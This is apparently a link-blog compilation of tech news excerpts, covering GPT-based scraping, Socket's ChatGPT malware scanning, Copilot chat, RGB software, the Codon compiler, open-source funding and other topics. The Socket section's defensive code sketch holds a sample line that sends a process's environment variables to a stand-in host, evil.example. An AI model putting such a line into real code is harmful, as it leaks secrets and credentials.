Scrapeghost is a novel approach to the problem of scraping web content in a structured way without needing to write the kind of page-specific code web scrapers usually have to deal with. How? Just enlist the help of a natural language AI. Scrapeghost relies on OpenAI’s GPT API to parse a web page’s content, pull out and classify any salient bits, and format it in a useful way.
What makes Scrapeghost different is how the data gets organized: when instantiating scrapeghost, you define the data you wish to extract. For example:
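A minimal sketch of what such a schema definition might look like, assuming scrapeghost’s SchemaScraper interface (the field names follow the example discussed below; the URL is purely illustrative):

```python
from scrapeghost import SchemaScraper

# Define the shape of the data you want back; scrapeghost hands the page
# and this schema to GPT and asks it to fill the schema in.
scrape_legislators = SchemaScraper(
    schema={
        "name": "string",
        "district": "string",
        "party": "string",
        "photo": "url",
        "offices": [{"name": "string", "address": "string", "phone": "string"}],
    }
)

# Point it at a page and get structured data back.
response = scrape_legislators("https://www.ilga.gov/house/rep.asp?MemberID=3071")
print(response.data)
```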
The kicker is that this format is entirely up to you! The GPT models are very, very good at processing natural language, and scrapeghost uses GPT to process the scraped data and find (using the example above) whatever looks like a name, district, party, photo, and office address and format it exactly as requested.
It’s an experimental tool and you’ll need an API key from OpenAI to use it, but it has useful features and is certainly a novel approach. There’s a tutorial and even a command-line interface, so check it out.
Several months ago, Socket, which makes a freemium security scanner for JavaScript and Python projects, connected OpenAI’s ChatGPT model (and more recently its GPT-4 model) to its internal threat feed.
The results, according to CEO Feross Aboukhadijeh, were surprisingly good. “It worked way better than expected,” he told The Register in an email. “Now I’m sitting on a couple hundred vulnerabilities and malware packages and we’re rushing to report them as quick as we can.”
Socket’s scanner was designed to detect supply chain attacks. Available as a GitHub app or a command line tool, it scans JavaScript and Python projects in an effort to determine whether any of the many packages that may have been imported from the npm or PyPI registries contain malicious code.
Aboukhadijeh said Socket has confirmed 227 vulnerabilities, all using ChatGPT. The vulnerabilities fall into different categories and don’t share common characteristics.
The Register was provided with numerous examples of published packages that exhibited malicious behavior or unsafe practices, including: information exfiltration, SQL injection, hardcoded credentials, potential privilege escalation, and backdoors.
We were asked not to share several examples as they have yet to be removed, but here’s one that has already been dealt with.
Example: mathjs-min
“Socket reported this to npm and it has been removed,” said Aboukhadijeh. “This was a pretty nasty one.”
AI analysis: “The script contains a discord token grabber function which is a serious security risk. It steals user tokens and sends them to an external server. This is malicious behavior.”
“There are some interesting effects as well, such as things that a human might be persuaded of but the AI is marking as a risk,” Aboukhadijeh added.
“These decisions are somewhat subjective, but the AI is not dissuaded by comments claiming that a dangerous piece of code is not malicious in nature. The AI even includes a humorous comment indicating that it doesn’t trust the inline comment.”
Example: trello-enterprise
AI analysis: “The script collects information like hostname, username, home directory, and current working directory and sends it to a remote server. While the author claims it is for bug bounty purposes, this behavior can still pose a privacy risk. The script also contains a blocking operation that can cause performance issues or unresponsiveness.”
Aboukhadijeh explained that the software packages at these registries are vast and it’s difficult to craft rules that thoroughly plumb the nuances of every file, script, and bit of configuration data. Rules tend to be fragile and often produce too much detail or miss things a savvy human reviewer would catch.
Applying human analysis to the entire corpus of a package registry (~1.3 million for npm and ~450,000 for PyPI) just isn’t feasible, but machine learning models can pick up some of the slack by helping human reviewers focus on the more dubious code modules.
“Socket is analyzing every npm and PyPI package with AI-based source code analysis using ChatGPT,” said Aboukhadijeh.
“When it finds something problematic in a package, we flag it for review and ask ChatGPT to briefly explain its findings. Like all AI-based tooling, this may produce some false positives, and we are not enabling this as a blocking issue until we gather more feedback on the feature.”
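Socket hasn’t published its prompts or pipeline, but the general pattern it describes (hand a package’s code to the model and ask for a brief risk assessment) might look roughly like this sketch; the model choice, prompt wording, and helper function here are assumptions, not Socket’s actual code:

```python
import openai  # pip install openai (the 0.x-era client)

openai.api_key = "sk-..."  # your OpenAI API key

def assess_package_script(source: str) -> str:
    """Ask the model for a brief risk assessment of a package script."""
    response = openai.ChatCompletion.create(
        model="gpt-3.5-turbo",  # assumed; Socket mentions ChatGPT and GPT-4
        temperature=0,
        messages=[
            {
                "role": "system",
                "content": (
                    "You review npm and PyPI package code for malicious or "
                    "risky behavior. Briefly explain any findings."
                ),
            },
            {"role": "user", "content": source},
        ],
    )
    return response["choices"][0]["message"]["content"]

# Example: flag an install script that exfiltrates environment variables.
suspicious = "require('https').get('https://evil.example/?d=' + JSON.stringify(process.env))"
print(assess_package_script(suspicious))
```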
Aboukhadijeh provided The Register with a sample report from its ChatGPT helper that identifies risky, though not conclusively malicious behavior. In this instance, the machine learning model offered this assessment, “This script collects sensitive information about the user’s system, including username, hostname, DNS servers, and package information, and sends it to an external server.”
What a ChatGPT-based Socket advisory looks like (screenshot of a ChatGPT report from the Socket security scanner)
According to Aboukhadijeh, Socket was designed to help developers make informed decisions about risk in a way that doesn’t interfere with their work. So raising the alarm about every install script – a common attack vector – can create too much noise. Analysis of these scripts using a large language model dials the alarm bell down and helps developers recognize real problems. And these models are becoming more capable.
Apple has quietly acquired a Mountain View-based startup, WaveOne, that was developing AI algorithms for compressing video.
Apple wouldn’t confirm the sale when asked for comment. But WaveOne’s website was shut down around January, and several former employees, including one of WaveOne’s co-founders, now work within Apple’s various machine learning groups.
WaveOne’s former head of sales and business development, Bob Stankosh, announced the sale in a LinkedIn post published a month ago.
“After almost two years at WaveOne, last week we finalized the sale of the company to Apple,” Stankosh wrote. “We started our journey at WaveOne, realizing that machine learning and deep learning video technology could potentially change the world. Apple saw this potential and took the opportunity to add it to their technology portfolio.”
[…]
WaveOne’s main innovation was a “content-aware” video compression and decompression algorithm that could run on the AI accelerators built into many phones and an increasing number of PCs. Leveraging AI-powered scene and object detection, the startup’s technology could essentially “understand” a video frame, allowing it to, for example, prioritize faces at the expense of other elements within a scene to save bandwidth.
WaveOne also claimed that its video compression tech was robust to sudden disruptions in connectivity. That is to say, it could make a “best guess” based on whatever bits it had available, so when bandwidth was suddenly restricted, the video wouldn’t freeze; it’d just show less detail for the duration.
WaveOne claimed its approach, which was hardware-agnostic, could reduce the size of video files by as much as half, with better gains in more complex scenes.
[…]
Even minor improvements in video compression could save on bandwidth costs, or enable services like Apple TV+ to deliver higher resolutions and framerates depending on the type of content being streamed.
YouTube’s already doing this. Last year, Alphabet’s DeepMind adapted a machine learning algorithm originally developed to play board games to the problem of compressing YouTube videos, leading to a 4% reduction in the amount of data the video-sharing service needs to stream to users.
[…] Introduced last summer after a year-long technical trial, Copilot offers coding suggestions, though not always good ones, to developers using GitHub with supported text editors and IDEs, like Visual Studio Code.
As of last month, according to GitHub, Copilot had a hand in 46 percent of the code being created on Microsoft’s cloud repo depot and had helped developers program up to 55 percent faster.
On Wednesday, Copilot – an AI “pair programmer”, as GitHub puts it – will be ready to converse with developers ChatGPT-style in either Visual Studio Code or Visual Studio. Prompt-and-response conversations take place in an IDE sidebar chat window, as opposed to the autocompletion responses that get generated from comment-based queries in a source file.
“Copilot chat is not just a chat window,” said Dohmke. “It recognizes what code a developer has typed, what error messages are shown, and it’s deeply embedded into the IDE.”
A developer thus can highlight, say, a regex in a source file and invite Copilot to explain what the obtuse pattern matching expression does. Copilot can also be asked to generate tests, to analyze and debug, to propose a fix, or to attempt a custom task. The model can even add comments that explain source code and can clean files up like a linter.
More interesting still, Copilot can be addressed by voice. Using spoken prompts, the assistive software can produce (or reproduce) code and run it on demand. It’s a worthy accessibility option at least.
[…]
When making a pull request under the watchful eye of AI, developers can expect to find GitHub’s model will fill out tags that serve to provide additional information about what’s going on. It then falls to developers to accept or revise the suggestions.
[…]
What’s more, Copilot’s ambit has been extended to documentation. Starting with documentation for React, Azure Docs, and MDN, developers can pose questions and get AI-generated answers through a chat interface. In time, according to Dohmke, the ability to interact with documentation via a chat interface will be extended to any organization’s repositories and internal documentation.
[…]
GitHub has even helped Copilot colonize the command line, with GitHub Copilot CLI. If you’ve ever forgotten an obscure command line incantation or command flag, Copilot has you covered.
RGB on your PC is cool, it’s beautiful and can be quite nuts, but it’s also quite complex, and trying to get it to do what you want isn’t always easy. This article is the result of many, many reboots and much Googling.
I set up a PC with 2×3 Lian Li Unifan SL 120 (top and side), 2 Lian Li Strimmer cables (an ATX and a PCIe), an NZXT Kraken Z73 CPU cooler (with LED screen, but cooled by the Lian Li Unifan SL 120 on the side, not the NZXT fans that came with it), 2 RGB DDR5 DRAM modules, an ASUS ROG GeForce RTX 2070 Super, an ASUS ROG Strix G690-F Gaming WiFi and a Corsair K95 RGB keyboard.
Happy rainbow colours! It seems to default to this every time I change stuff
It’s no mean feat doing all the wiring on the fan controllers nowadays, and the instructions don’t make it much easier. Here is the wiring setup for this build (excluding the keyboard):
The problem is that all of this hardware comes with its own bloated, janky software in order to get it to do stuff.
ASUS: Armory Crate / ASUS AURA
This thing takes up loads of memory and breaks often.
I decided to get rid of it once it had problems updating my drivers. You can still download Aura separately (although there is a warning that it will no longer be updated). To uninstall Armory Crate you can’t just uninstall everything from Add or Remove Programs; you need the uninstall tool, which will also get rid of the scheduled tasks and a directory the Windows uninstallers leave behind.
Once you install Aura separately, it still spawns an insane number of processes, but you don’t actually need to run Aura to change the RGB on the VGA and DRAM. Oddly enough, not the motherboard itself though.
Just running AURA, not Armory Crate
You also can use other programs. Theoretically. That’s what the rest of this article is about. But in the end, I used Aura.
If you read on, it may be the case that I can’t get a lot of the other stuff to work because I don’t have Armory Crate installed. Nothing will work if I don’t have Aura installed, so I may as well use that.
Note: if you want to follow your driver updates, there’s a thread on the Republic of Gamers website that follows a whole load of them.
Problem I never solved: getting the Motherboard itself to show under Aura.
Corsair: iCUE
Yup, this takes up memory, works pretty well, keeps updating for no apparent reason, and quite often I have to slide the switch left and right to get it detected as a USB device so the lighting works again. In terms of interface it’s quite easy to use.
Woohoo! All these processes for keyboard lighting!
It detects and can monitor the motherboard, but can’t control the lighting on it. Once upon a time it did. Maybe this is because I’m not running the whole Armory Crate thing any more.
No idea.
Note: if you turn everything on in the dashboard, memory usage goes up to 500 MB.
In fact, just having the iCUE screen open uses up ~200MB of memory.
It’s the most user friendly way of doing keyboard lighting effects though, so I keep it.
OpenRGB
When I first started running it, it told me I needed to run it as an administrator to get a driver working. I ran it and it hung my computer at device detection. Later on it started rebooting it. After installing the underlying Asus Aura services it ran for me. [Note: the following applies to the standard 0.8 build.] Once, that is; it reboots my PC after device detection now. Lots of people on Reddit have it working, so maybe it needs the Armory Crate software. I have opened an issue, hopefully it will get fixed? According to a Reddit user, this could be because “If you have armoury crate installed, OpenRGB cannot detect your motherboard, if your ram is ddr5 [note: which mine is], you’ll gonna have to wait or download the latest pipeline version”.
OK, so the Pipeline build does work and even detects my motherboard! Unfortunately it doesn’t write the setting to the motherboard, so after a reboot it goes back to rainbow. After my second attempt the setting seems to have stuck and survived the reboot. However, it still hangs the computer on a reboot (everything turns off except the PC itself) and it can take quite some time to open the interface. It also sometimes does and sometimes doesn’t detect the DRAM modules. Issue opened here.
Even with the interface open, the memory footprint is tiny!
Note that it saves the settings to C:\Users\razor\AppData\Roaming\OpenRGB and you can find the logs there too.
SignalRGB
This looks quite good at first glance – it detected my devices and was able to apply effects to all of them at once. Awesome! Unfortunately it has a huge memory footprint (around 600MB!) and doesn’t write the settings to the devices, so if after a reboot you don’t run SignalRGB the hardware won’t show any lighting at all, they will all be turned off.
It comes in a free tier with most of what you need and a paid subscription tier, which costs $4 per month ($48 per year)! Considering what this does and the price of most of these kinds of one-trick-pony utils (a one-time fee of around $20), this is incredibly high. On Reddit the developers are aggressive in saying they need to keep developing in order to support new hardware, and if you think they are charging a lot of money for this you are nuts. Also, in order to download the free effects you need an account with them.
So nope, not using this.
JackNet RGBSync
Another open source RGB program; I got it to detect my keyboard and not much else. Development stopped in 2020. The UI leaves a lot to be desired.
Gigabyte RGB Fusion
Googling alternatives to Aura, you will run into this one. It’s not compatible with my rig and doesn’t detect anything. Not really too surprising, considering my stuff is all from their competitor, Asus.
L-Connect 2 and 3
For the Lian Li fans and the Strimmer cables I use L-Connect 2. It has a setting saying it should take over the motherboard setting, but this has stopped working. Maybe I need Armory Crate. It’s a bit clunky (to change settings you need to select which fans in the array you want to send an effect to and it always shows 4 arrays of 4 fans, which I don’t actually have), but it writes settings to the devices so you don’t need it running in the background.
L-Connect 3 runs extremely slowly. It’s not hung, it’s just incredibly slow. Don’t know why, but could be Armory Crate related.
NZXT CAM
This you need in the background or the LED screen on the Kraken will show the default: CPU temperature only. It takes a very long time to start up. It also requires quite a bit of memory to run, which is pretty bizarre if all you want to do is show a few animated GIFs on your CPU cooler in carousel mode.
Interface up on the screen; running in the background
So, it’s shit but you really really need it if you want the display on the CPU cooler to work.
Fan Control
So not really RGB, but related: Fan Control for Windows.
Also, G-helper works for fan control and GPU switching.
Conclusion
None of the alternatives really works very well for me. None of them can control the Lian-Li Strimmer devices, and most of them only control a few of my devices or have prohibitive licenses attached for what they are. What is more, in order to use the alternatives, you still need to install the ASUS motherboard driver, which is exactly what I had been hoping to avoid. OpenRGB shows the most promise but is still not quite there yet – but it does work for a lot of people, so hopefully it will work for you too. Good luck and prepare to reboot… a lot!
Codon is a new “high-performance Python compiler that compiles Python code to native machine code without any runtime overhead,” according to its README file on GitHub. Typical speedups over Python are on the order of 10-100x or more, on a single thread. Codon’s performance is typically on par with (and sometimes better than) that of C/C++. Unlike Python, Codon supports native multithreading, which can lead to speedups many times higher still.
Its development team includes researchers from MIT’s Computer Science and Artificial Intelligence lab, according to this announcement from MIT shared by long-time Slashdot reader Futurepower(R): The compiler lets developers create new domain-specific languages (DSLs) within Python — which is typically orders of magnitude slower than languages like C or C++ — while still getting the performance benefits of those other languages. “We realized that people don’t necessarily want to learn a new language, or a new tool, especially those who are nontechnical. So we thought, let’s take Python syntax, semantics, and libraries and incorporate them into a new system built from the ground up,” says Ariya Shajii SM ’18, PhD ’21, lead author on a new paper about the team’s new system, Codon. “The user simply writes Python like they’re used to, without having to worry about data types or performance, which we handle automatically — and the result is that their code runs 10 to 100 times faster than regular Python. Codon is already being used commercially in fields like quantitative finance, bioinformatics, and deep learning.”
The team put Codon through some rigorous testing, and it punched above its weight. Specifically, they took roughly 10 commonly used genomics applications written in Python and compiled them using Codon, and achieved five to 10 times speedups over the original hand-optimized implementations…. The Codon platform also has a parallel backend that lets users write Python code that can be explicitly compiled for GPUs or multiple cores, tasks which have traditionally required low-level programming expertise…. Part of the innovation with Codon is that the tool does type checking before running the program. That lets the compiler convert the code to native machine code, which avoids all of the overhead that Python has in dealing with data types at runtime.
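As a rough illustration of the workflow described above: you write ordinary Python and compile it ahead of time with Codon’s command-line tool. Treat the exact flags below as a sketch based on Codon’s public README rather than gospel:

```python
# fib.py -- plain Python syntax, compiled to native machine code by Codon.
# Assumed invocations (check the Codon docs for your version):
#   codon run -release fib.py          # compile and run in one step
#   codon build -release -exe fib.py   # emit a standalone native executable

def fib(n):
    a, b = 0, 1
    while a < n:
        print(a, end=" ")
        a, b = b, a + b
    print()

fib(1000)

# Codon also exposes explicit parallelism via an @par annotation on loops,
# which is part of what the article means by "native multithreading".
```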
Denis Pushkarev, maintainer of the core-js library used by millions of websites, says he’s ready to give up open source development because so few people pay for the software upon which they depend.
“Free open source software is fundamentally broken,” he wrote in a note on the core-js repository. “I could stop working on this silently, but I want to give open source one last chance.”
The issue of who pays for open source software, often created or managed by unpaid volunteers, continues to be a source of friction and discontent in the coding community.
Feross Aboukhadijeh, an open source developer and CEO of security biz Socket, had a lot to say on the subject in an email to The Register:
Maintainers are the unsung heroes of the software world, pouring their hearts into creating vast amounts of value that often goes unappreciated. These unsung heroes perform critical work that enables all of modern technology to function – this is not an exaggeration. These tireless individuals dedicate themselves to writing new features, fixing bugs, answering user inquiries, improving documentation, and developing innovative new software, yet they receive almost no recognition for their efforts.
It is imperative for the commercial industry and open source community to come together and find a way to acknowledge and reward maintainers for their invaluable contributions. As long as significant personal sacrifice is a prerequisite for open source participation, we’ll continue to exclude a lot of smart and talented folks. This isn’t good for anyone.
Maintainers of packages that are not installed directly, such as core-js, which often comes along for the ride when installing other packages, have it especially hard. Reliable, error-free transitive dependencies are invisible. Therefore, the maintainers are invisible, too. Perversely, the better these maintainers do their job, the more invisible they are. No one ever visits a GitHub repository for a transitive dependency that works perfectly – there’s no reason to do so. But a developer investigating an error stack trace might visit the repository if for no other reason than to file an issue. This is the exact problem that the core-js maintainer faced.
For the large companies that get more from the free labor in open source code than they pay out in donations – if indeed they pay out – the status quo looks like a pretty good deal.
For individual developers, however, code creation and maintenance without compensation has a cost – measurable not just in financial terms, but also in social and political capital.
For Pushkarev, known as zloirock on GitHub, the situation is that core-js is a JavaScript library that’s been downloaded billions of times and used on more than half of the top 10,000 websites – but the income he receives from donations has fallen dramatically. When he started maintaining core-js full time he could count on about $2,500 per month, and that’s down to about $400 per month at present.
The post then goes on to politicise the guy who is complaining and mention some other stuff from the past – but that does not invalidate the point that many FOSS developers are creating software that businesses profit hugely from while the developers themselves don’t see a thing for it – except random hate.
After a delay of over a year, an open source code contribution to enable the export of data from Datadog’s Application Performance Monitoring (APM) platform finally got merged on Tuesday into a collection of OpenTelemetry components.
The reason for the delay, according to John Dorman, the software developer who wrote the Datadog APM Receiver code, is that, about a year ago, Datadog asked him not to submit the software.
On February 8 last year Dorman, who goes by the name “boostchicken” on GitHub, announced that he was closing his pull request – the git term for programming code contributed to a project.
“After some consideration I’ve decided to close this PR [pull request],” he wrote. “[T]here are better ways to OTEL [OpenTelemetry] support w/ Datadog.”
Members of the open source community who are focused on application monitoring – collecting and analyzing logs, traces of app activity, and other metrics that can be useful to keep applications running – had questions, claiming that Datadog prefers to lock customers into its product.
Shortly after the post, Charity Majors, CEO of Honeycomb.io, a rival application monitoring firm, wrote a Twitter thread elaborating on the benefits of OpenTelemetry and calling out Datadog for only supporting OTEL as a one-way street.
“Datadog has been telling users they can use OTEL to get data in, but not get data out,” Majors wrote. “The Datadog OTEL collector PR was silently killed. The person who wrote it appears to have been pressured into closing it, and nothing has been proposed to replace it.”
Behavior of this sort would be inconsistent with the goals of the Cloud Native Computing Foundation’s (CNCF) OpenTelemetry project, which seeks “to provide a set of standardized vendor-agnostic SDKs, APIs, and tools for ingesting, transforming, and sending data to an Observability back-end (i.e. open source or commercial vendor).”
That is to say, the OpenTelemetry project aims to promote data portability, instead of hindering it, as is common among proprietary software vendors.
The smoking hound
On January 26 Dorman confirmed suspicions that he had been approached by Datadog and asked not to proceed with his efforts.
“I owe the community an apology on this one,” Dorman wrote in his pull request thread. “I lacked the courage of my convictions and when push came to shove and I had to make the hard choice, I took the easy way out.”
“Datadog ‘asked’ me to kill this pull request. There were other members from my organization present that let me know this answer will be a ‘ok’. I am sure I could have said no, at the moment I just couldn’t fathom opening Pandora’s Box. There you have it, no NDA, no stack of cash. I left the code hoping someone could carry on. I was willing to give [Datadog] this code, no strings attached as long as it moved OTel forward. They declined.”
He added, “However, I told them if you don’t support OpenTelemetry in a meaningful way, I will start sending pull requests again. So here we are. I feel I have given them enough time to do the right thing.”
Indeed, Dorman subsequently re-opened his pull request, which on Tuesday was merged into the repository for OpenTelemetry Collector components. His Datadog APM Receiver can ingest traces in the Datadog Trace Agent format.
Coincidentally, Datadog on Tuesday published a blog post titled, “Datadog’s commitment to OpenTelemetry and the open source community.” It makes no mention of the alleged request to “kill [the] pull request.” Instead, it enumerates various ways in which the company has supported OpenTelemetry recently.
The Register asked Datadog for comment. We’ve not heard back.
Dorman, who presently works for Meta, did not respond to a request for comment. However, last week, via Twitter, he credited Grafana, an open source Datadog competitor, for having “formally sponsored” the work and for pointing out that Datadog “refuses to support OTEL in meaningful ways.”
“We’re still trying to make sense of what happened here; we’ll comment on it once we have a full understanding. Regardless, we are happy to review and accept any contributions which push the project forward, and this [pull request] was merged yesterday,” it said.
AI bot ChatGPT has been put to the test on a number of tasks in recent weeks, and its latest challenge comes courtesy of computer science researchers from Johannes Gutenberg University and University College London, who found that ChatGPT can weed out errors in sample code and fix it better than existing programs designed to do the same.
Researchers gave 40 pieces of buggy code to four different code-fixing systems: ChatGPT, Codex, CoCoNut, and standard APR. Essentially, they asked ChatGPT “What’s wrong with this code?” and then copied and pasted the code into the chat function.
On the first pass, ChatGPT performed about as well as the other systems. ChatGPT solved 19 problems, Codex solved 21, CoCoNut solved 19, and standard APR methods figured out seven. The researchers found its answers to be most similar to Codex, which was “not surprising, as ChatGPT and Codex are from the same family of language models.”
However, the ability to, well, chat with ChatGPT after receiving the initial answer made the difference, ultimately leading to ChatGPT solving 31 questions, and easily outperforming the others, which provided more static answers.
[…]
They found that ChatGPT was able to solve some problems quickly, while others took more back and forth. “ChatGPT seems to have a relatively high variance when fixing bugs,” the study says. “For an end-user, however, this means that it can be helpful to execute requests multiple times.”
For example, when the researchers asked the question pictured below, they expected ChatGPT to recommend replacing n^=n-1 with n&=n-1, but the first thing ChatGPT said was, “I’m unable to tell if the program has a bug without more information on the expected behavior.” On ChatGPT’s third response, after more prompting from researchers, it found the problem.
(Credit: Dominik Sobania, Martin Briesch, Carol Hanna, Justyna Petke)
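The benchmark program itself isn’t reproduced in the article, but the expected fix points at the classic bit-counting idiom. A hypothetical reconstruction of that kind of bug (illustrative only, not the study’s exact code):

```python
def count_set_bits(n: int) -> int:
    """Count the 1-bits in n."""
    count = 0
    while n:
        # Buggy version: n ^= n - 1 sets every bit below the lowest set bit,
        # so for many inputs (e.g. n == 1) the loop never terminates.
        # Fixed version: n &= n - 1 clears exactly the lowest set bit.
        n &= n - 1
        count += 1
    return count

assert count_set_bits(0b10110) == 3
```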
However, when PCMag entered the same question into ChatGPT, it answered differently. Rather than needing to tell it what the expected behavior is, it guessed what it was.
Microsoft wants to know how many out-of-support copies of Office are installed on Windows PCs, and it intends to find out by pushing a patch through Microsoft Update that it swears is safe, not that you asked.
Quietly mentioned in a support post this week, update KB5021751 is targeting versions of Office “including” 2007 and 2010, both of which have been out of service for several years. Office 2013 is also being asked after as it’s due to lose support this coming April.
“This update will run one time silently without installing anything on the user’s device,” Microsoft said, followed by instructions on how to download and install the update, which Microsoft said has been scanned to ensure it’s not infected by malware.
[…]
Microsoft’s description of its out-of-support Office census update leaves much to the imagination, including whether the paragraph describing installation of the update, directly contradicting the paragraph above, is simply misplaced boilerplate language that doesn’t apply to KB5021751.
Also missing is any explanation of how the update will gather info on Office installations, whether it is collecting any other system information or what exactly will be transmitted and stored by Microsoft.
Because the nature of the update is unclear, it’s also unknown what may be left behind after it runs. Microsoft said that it is a single-run, silent process, but left off mention of traces of the update that may be left behind.
The Z-Wave Alliance, the Standards Development Organization (SDO) dedicated to advancing the smart home and Z-Wave® technology, today announced the completion of the Z-Wave Source Code project, which has been published and made available on GitHub to Alliance members.
The Z-Wave Source Code Project opens development of Z-Wave and enables members to contribute code to shape the future of the protocol under the supervision of the new OS Work Group (OSWG).
Recently, I watched a fellow particle physicist talk about a calculation he had pushed to a new height of precision. His tool? A 1980s-era computer program called FORM.
[…]
Developed by the Dutch particle physicist Jos Vermaseren, FORM is a key part of the infrastructure of particle physics, necessary for the hardest calculations. However, as with surprisingly many essential pieces of digital infrastructure, FORM’s maintenance rests largely on one person: Vermaseren himself. And at 73, Vermaseren has begun to step back from FORM development. Due to the incentive structure of academia, which prizes published papers, not software tools, no successor has emerged.
[…]
Since 2000, a particle physics paper that cites FORM has been published every few days, on average. “Most of the [high-precision] results that our group obtained in the past 20 years were heavily based on FORM code,” said Thomas Gehrmann, a professor at the University of Zurich.
Some of FORM’s popularity came from specialized algorithms that were built up over the years, such as a trick for quickly multiplying certain pieces of a Feynman diagram, and a procedure for rearranging equations to have as few multiplications and additions as possible. But FORM’s oldest and most powerful advantage is how it handles memory.
[…]
FORM bypasses swapping and uses its own technique. When you work with an equation in FORM, the program assigns each term a fixed amount of space on the hard disk. This technique lets the software more easily keep track of where the pieces of an equation are. It also makes it easy to bring those pieces back to main memory when they are needed without accessing the rest.
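FORM itself is written in C and far more sophisticated, but the core idea described above, giving each term a fixed-size slot on disk so any single term can be paged back in on its own, can be sketched in a few lines (purely illustrative):

```python
TERM_SLOT = 256  # bytes reserved per term; the fixed size is what makes seeking trivial

def write_terms(path, terms):
    """Store each term of an expression in its own fixed-size slot on disk."""
    with open(path, "wb") as f:
        for term in terms:
            f.write(term.encode().ljust(TERM_SLOT, b"\0"))

def read_term(path, index):
    """Bring a single term back into memory without touching the rest."""
    with open(path, "rb") as f:
        f.seek(index * TERM_SLOT)  # the slot position follows directly from the index
        return f.read(TERM_SLOT).rstrip(b"\0").decode()

write_terms("expr.dat", ["3*x**2*y", "-2*x*y**2", "y**3"])
print(read_term("expr.dat", 1))  # -> -2*x*y**2
```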
Memory has grown since FORM’s early days, from 128 kilobytes of RAM in the Atari 130XE in 1985 to 128 gigabytes of RAM in my souped-up desktop — a millionfold improvement. But the tricks Vermaseren developed remain crucial. As particle physicists pore through petabytes of data from the Large Hadron Collider to search for evidence of new particles, their need for precision, and thus the length of their equations, grows longer.
[…]
As crucial as software like FORM is for physics, the effort to develop it is often undervalued. Vermaseren was lucky in that he had a permanent position at the National Institute for Subatomic Physics in the Netherlands, and a boss who appreciated the project. But such luck is hard to come by. Stefano Laporta, an Italian physicist who developed a crucial simplification algorithm for the field, has spent most of his career without funding for students or equipment. Universities tend to track scientists’ publication records, which means those who work on critical infrastructure are often passed over for hiring or tenure.
“I have seen over the years, consistently, that people who spend a lot of time on computers don’t get a tenure job in physics,” said Vermaseren.
[…]
Without ongoing development, FORM will get less and less usable — only able to interact with older computer code, and not aligned with how today’s students learn to program. Experienced users will stick with it, but younger researchers will adopt alternative computer algebra programs like Mathematica that are more user-friendly but orders of magnitude slower. In practice, many of these physicists will decide that certain problems are off-limits — too difficult to handle. So particle physics will stall, with only a few people able to work on the hardest calculations.
In April, Vermaseren is holding a summit of FORM users to plan for the future. They will discuss how to keep FORM alive: how to maintain and extend it, and how to show a new generation of students just how much it can do. With luck, hard work and funding, they may preserve one of the most powerful tools in physics.
[…] New evidence shows that ID.me “inaccurately overstated its capacity to conduct identity verification services to the Internal Revenue Service (IRS) and made baseless claims about the amount of federal funds lost to pandemic fraud in an apparent attempt to increase demand for its identity verification services,” according to a new report from the two U.S. House of Representatives committees overseeing the government’s COVID-19 response.
The report also said that ID.me—which received $45 million in COVID relief funds from at least 25 state agencies—misrepresented the excessively long wait times it forced on people trying to claim emergency benefits like unemployment insurance and Child Tax Credit payments. Wait times for video chats were as long as 4 to 9 hours in some states.
“Not only does this violate individuals’ privacy, but the inevitable false matches associated with one-to-many recognition can result in applicants being wrongly denied desperately-needed services for weeks or even months as they try to get their case reviewed,” the letter stated.
Microsoft has started testing a new search and filtering system for the Task Manager on Windows 11. It will allow Windows users to easily search for a misbehaving app and end its process or quickly create a dump file, enable efficiency mode, and more.
“This is the top feature request from our users to filter / search for processes,” explains the Windows Insider team in a blog post. “You can filter either using the binary name, PID or publisher name. The filter algorithm matches the context keyword with all possible matches and displays them on the current page.”
You’ll be able to use the alt + F keyboard shortcut to jump to the filter box in the Task Manager, and results will be filtered into single or groups of processes that you can monitor or take action on.
This page lists design patterns for dashboard design, collected to support the design and creative exploration of dashboards. We ran a dedicated workshop in March 2022 to help you apply and discuss design patterns in your work.
What are Dashboards?
Dashboards offer a curated lens through which people view large and complex data sets at a glance. They combine visual representations and other graphical embellishments to provide layers of abstraction and simplification for numerous related data points, so that dashboard viewers get an overview of the most important or relevant information, in a time efficient way. Their ability to provide insight at a glance has led to dashboards being widely used across many application domains, such as business, nursing and hospitals, public health, learning analytics, urban analytics, personal analytics, energy and more.
There are many high-level guidelines on dashboard design, including advice about visual perception, reducing information load, the use of interaction, and visualization literacy. Despite this, we know little about effective and applicable dashboard design, and about how to support rapid dashboard design.
Dashboard design is admittedly not straightforward: designers have access to numerous data streams which they can process, abstract or simplify as they see fit; they have a wide range of visual representations at their disposal; and they can structure and present these visualizations in numerous ways, to take advantage of the large screens on which they are viewed (vs. individual plots that make more economic use of space).
Such a range of choices can be overwhelming, so there is a timely need for guidance about effective dashboard design—especially as dashboards are increasingly being designed for a wider non-expert audience by a wide group of designers who may not have a background in visualization or interface design.
A federal judge in Texas has ordered Meta to pay Voxer, the developer of an app called Walkie Talkie, nearly $175 million as an ongoing royalty. Voxer accused Meta of infringing its patents and incorporating that tech in Instagram Live and Facebook Live.
In 2006, Tom Katis, the founder of Voxer, started working on a way to resolve communications problems he faced while serving in the US Army in Afghanistan, as TechCrunch notes. Katis and his team developed tech that allows for live voice and video transmissions, which led to Voxer debuting the Walkie Talkie app in 2011.
According to the lawsuit, soon after Voxer released the app, Meta (then known as Facebook) approached the company about a collaboration. Voxer is said to have revealed its proprietary technology as well as its patent portfolio to Meta, but the two sides didn’t reach an agreement. Voxer claims that even though Meta didn’t have live video or voice services back then, it identified the Walkie Talkie developer as a competitor and shut down access to Facebook features such as the “Find Friends” tool.
Meta debuted Facebook Live in 2015. Katis claims to have had a chance meeting with a Facebook Live product manager in early 2016 to discuss the alleged infringements of Voxer’s patents in that product, but Meta declined to reach a deal with the company. The latter released Instagram Live later that year. “Both products incorporate Voxer’s technologies and infringe its patents,” Voxer claimed in the lawsuit.
People feel like they don’t have control over their YouTube recommendations…
Our 2021 investigation into YouTube’s recommender system uncovered a range of problems on the platform: an opaque algorithm, inconsistent oversight, and geographic inequalities. We also learned that people feel they don’t have control over their YouTube experience — particularly the videos that are recommended to them.
YouTube says that people can manage their video recommendations through the feedback tools the platform offers. But do YouTube’s user controls actually work?
Our study shows that they really don’t.
[…]
In the qualitative portion of our study, we learned that people do not feel in control of their experience on YouTube, nor do they have clear information about how to curate their recommendations. Many people take a trial-and-error approach to controlling their recommendations using YouTube’s hodgepodge of options, like “Dislike,” “Not Interested,” and other buttons. It doesn’t seem to work.
[…]
we ran a randomized controlled experiment across our community of RegretsReporter participants that could directly test the effectiveness of YouTube’s user controls. We found that YouTube’s user controls somewhat influence what is recommended, but this effect is meager and most unwanted videos still slip through.
